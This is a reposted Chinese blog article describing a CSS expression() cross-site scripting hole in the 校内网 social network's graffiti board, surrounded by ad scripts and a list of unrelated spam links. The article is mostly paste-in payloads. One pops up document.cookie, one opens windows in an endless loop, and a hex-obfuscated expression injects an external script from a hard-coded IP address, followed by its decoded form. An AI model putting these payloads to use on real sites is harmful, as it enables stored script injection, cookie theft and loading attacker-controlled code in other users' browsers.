程序博客网 > 喜欢一个人知乎

又见css漏洞!校内网css代码引发的漏洞

来源:互联网 发布:喜欢一个人知乎 编辑:程序博客网 时间:2024/04/27 23:37
<script type="text/javascript"><!--google_ad_client = "pub-1654710028568330";/* 728x90, 创建于 08-5-19 */google_ad_slot = "5790075209";google_ad_width = 728;google_ad_height = 90;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script><script type="text/javascript"><!--google_ad_client = "pub-1654710028568330";/* 728x15, 创建于 08-5-19 */google_ad_slot = "1395130186";google_ad_width = 728;google_ad_height = 15;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>

由涂鸦板css引来的漏洞

1、expression

如下语句加入到自己的涂鸦里去 ,
<DIV STYLE="width: expression(window.open('http://www.baidu.com'));">
这句会弹出窗口,死循环
<DIV STYLE="width: expression(alert(document.cookie));">
这句弹出你的cookie

2、behavior

将页面中元素绑定行为。


实例转:

1. 在你的 校内网 涂鸦版里插入以下代码:


<span id=spantarget></span>
<span id="jsInject" style="color:expression(eval(' //x74//x72//x79//x7B//x65//x73//x74//x2B//x2B//x3B//x7D//x63//x61//x74//x63//x68//x28//x65//x29//x7B//x65//x73//x74//x3D//x30//x3B//x7D//x3B//x69//x66//x20//x28//x65//x73//x74//x3C//x31//x29//x7B//x76//x61//x72//x20//x6F//x4A//x53//x3D//x64//x6F//x63//x75//x6D//x65//x6E//x74//x2E//x63//x72//x65//x61//x74//x65//x45//x6C//x65//x6D//x65//x6E//x74//x28//x27//x73//x63//x72//x69//x70//x74//x27//x29//x3B//x6F//x4A//x53//x2E//x73//x72//x63//x3D//x27//x68//x74//x74//x70//x3A//x2F//x2F//x32//x30//x32//x2E//x31//x31//x35//x2E//x32//x32//x2E//x31//x34//x31//x2F//x65//x73//x74//x2F//x78//x69//x61//x6F//x6E//x65//x69//x2E//x6A//x73//x27//x3B//x73//x70//x61//x6E//x74//x61//x72//x67//x65//x74//x2E//x61//x70//x70//x65//x6E//x64//x43//x68//x69//x6C//x64//x28//x6F//x4A//x53//x29//x3B//x7D ') )"></span>

 

其中转义字符为:

try{est++;}catch(e){est=0;};if (est<1){var oJS=document.createElement('script');oJS.src='http://202.115.22.141/est/xiaonei.js';spantarget.appendChild(oJS);}


2. 用到的外部javascript:


alert('External Javascript loaded!');
jsInject.cssText="";
alert('Expression stoped');

 
 关键字:校内网css代码  漏洞

<script type="text/javascript"><!--google_ad_client = "pub-1654710028568330";/* 728x90, 创建于 08-5-19 */google_ad_slot = "5790075209";google_ad_width = 728;google_ad_height = 90;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script><script type="text/javascript"><!--google_ad_client = "pub-1654710028568330";/* 728x15, 创建于 08-5-19 */google_ad_slot = "1395130186";google_ad_width = 728;google_ad_height = 15;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
喜欢一个人知乎 喜欢一个人知乎
原创粉丝点击
热门IT博客
淘宝信誉131458淘宝信誉131458
多线程ping java多线程ping java
物流数据分析员
中专毕业证制作软件
大数据展示平台源码
查询 域名 最早 注册人
知其不善则速改以从善
css是什么软件
mac finder 获取路径
淘宝banner制作
将军岂有意乎翻译
网络限速设置多少合适
windows更改键盘布局
手机知乎怎么看提问者
eclipse怎么写java
淘宝运费险保费
网络支付异地消费
国外必备软件
c语言函数库 chm
高性能网络郝卫东
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 差一点出轨了怎么办 出轨对不起老公怎么办 螺丝反牙怎么办 螺纹大了怎么办 角阀头拧断了怎么办 六角螺丝打滑怎么办 扳手不够大怎么办 没有扳手怎么办 扳手太小怎么办 没有六角板子怎么办 家里没有扳手怎么办 螺母被拧圆了怎么办 螺丝跟着转怎么办 螺母跟着转怎么办 无退刀槽的螺纹怎么办 螺栓拧不动怎么办 容易湿寒入体怎么办 母猫涨奶有硬块怎么办 狗涨奶发烧怎么办 后桥通气塞甩油怎么办 鼻子老塞不通气怎么办 螺丝锈死拧不下来怎么办 六角螺丝头滑丝怎么办 没有t20螺丝刀怎么办 十字螺丝下不来怎么办 铣刀螺丝下不来怎么办 螺丝刀小一号怎么办 没有u螺丝刀怎么办 没有十字花螺丝刀怎么办 cinepic图片不全怎么办 弓弩打鸟打不准怎么办 电脑没网卡怎么办 固态硬盘薄怎么办 笔记本电脑卡怎么办 联想z470黑屏怎么办 手提电脑太卡怎么办 win10蓝屏 怎么办 笔记本蓝屏怎么办啊 联想z5070打不开怎么办 win10卡怎么办 appdata太大怎么办

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里